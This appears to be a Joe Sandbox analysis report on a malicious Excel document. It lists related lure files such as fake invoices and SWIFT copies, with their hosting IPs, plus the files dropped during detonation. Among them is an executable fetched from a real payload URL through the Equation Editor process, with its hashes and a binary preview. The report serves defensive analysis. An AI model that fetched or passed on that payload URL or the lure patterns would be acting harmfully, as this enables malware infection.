        OVHFR | 5siADx4Pdz.exe | malicious | 51.89.96.41
        OVHFR | 9e5SOQ1wPz | malicious | 139.99.135.131
        OVHFR | 7LqDcyRJiN | malicious | 139.99.135.131
        AS-COLOCROSSINGUS | 70A and 90A, quantity 20000 tons.xlsx | malicious | 192.3.141.149
        AS-COLOCROSSINGUS | Remittance_Advice_details001009142021.xlsx | malicious | 107.173.219.122
        AS-COLOCROSSINGUS | ORDER CONFIRMATION.xlsx | malicious | 198.23.212.143
        AS-COLOCROSSINGUS | Pedido.xlsx | malicious | 172.245.26.190
        AS-COLOCROSSINGUS | #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx | malicious | 23.95.85.181
        AS-COLOCROSSINGUS | 09142021_PDF.vbs | malicious | 23.94.82.41
        AS-COLOCROSSINGUS | Swift Mt103.xlsx | malicious | 23.95.13.175
        AS-COLOCROSSINGUS | vkb.xlsx | malicious | 192.3.13.11
        AS-COLOCROSSINGUS | Transfer Swift.xlsx | malicious | 172.245.26.190
        AS-COLOCROSSINGUS | ORDER 5172020.xlsx | malicious | 198.12.84.109
        AS-COLOCROSSINGUS | REF_MIDLGB34.xlsx | malicious | 23.94.159.208
        AS-COLOCROSSINGUS | proforma invoice.xlsx | malicious | 192.3.141.149
        AS-COLOCROSSINGUS | Swift_Mt103.xlsx | malicious | 23.95.13.175
        AS-COLOCROSSINGUS | PO-80722 .xlsx | malicious | 198.12.84.109
        AS-COLOCROSSINGUS | MT103-Swift Copy.xlsx | malicious | 198.46.199.203
        AS-COLOCROSSINGUS | Items_quote.xlsx | malicious | 172.245.26.145
        AS-COLOCROSSINGUS | Usd_transfer.xlsx | malicious | 172.245.26.145
        AS-COLOCROSSINGUS | REF_MIDLGB34.xlsx | malicious | 23.94.159.208
        AS-COLOCROSSINGUS | ORDER RFQ1009202.xlsx | malicious | 23.95.85.181
        AS-COLOCROSSINGUS | msn.xlsx | malicious | 198.12.127.217

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.12.84.109/cmd/vbc.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\248940E8.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2791E8B4.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A4E0740.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B379A2D.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39A93B7B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):648132
                                              Entropy (8bit):2.8123660050383266
                                              Encrypted:false
                                              SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                              MD5:E48BF4960F779FF5CD42B9143833B42F
                                              SHA1:7DA5EF13228B3557115ADFAA174E30339B3BB83A
                                              SHA-256:D7AE3B836541DA12D810FA9F15513160FE1CD7F362364A5579058DCAC07D8D0A
                                              SHA-512:F899C259D8BC55392116F12F0BF652358562948037754E17BFABEEF89FAA1B22A60D398249B1B21F5E0845F9691BD70CD5727FBC37257465FC590BD15CF5F25B
                                              Malicious:false
                                              Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................DY$...T.S.-zMY.@..%...0.S.t.S.......S.X.S..N.Z..S...S.....@.S...S..N.Z..S...S. ....yMY..S...S. ............zMY........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........d.S.X.....S...S............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480E59C3.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E372F4E.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67A5C24A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CC89F36.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A26CB4E2.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1E599BF.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEB48925.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
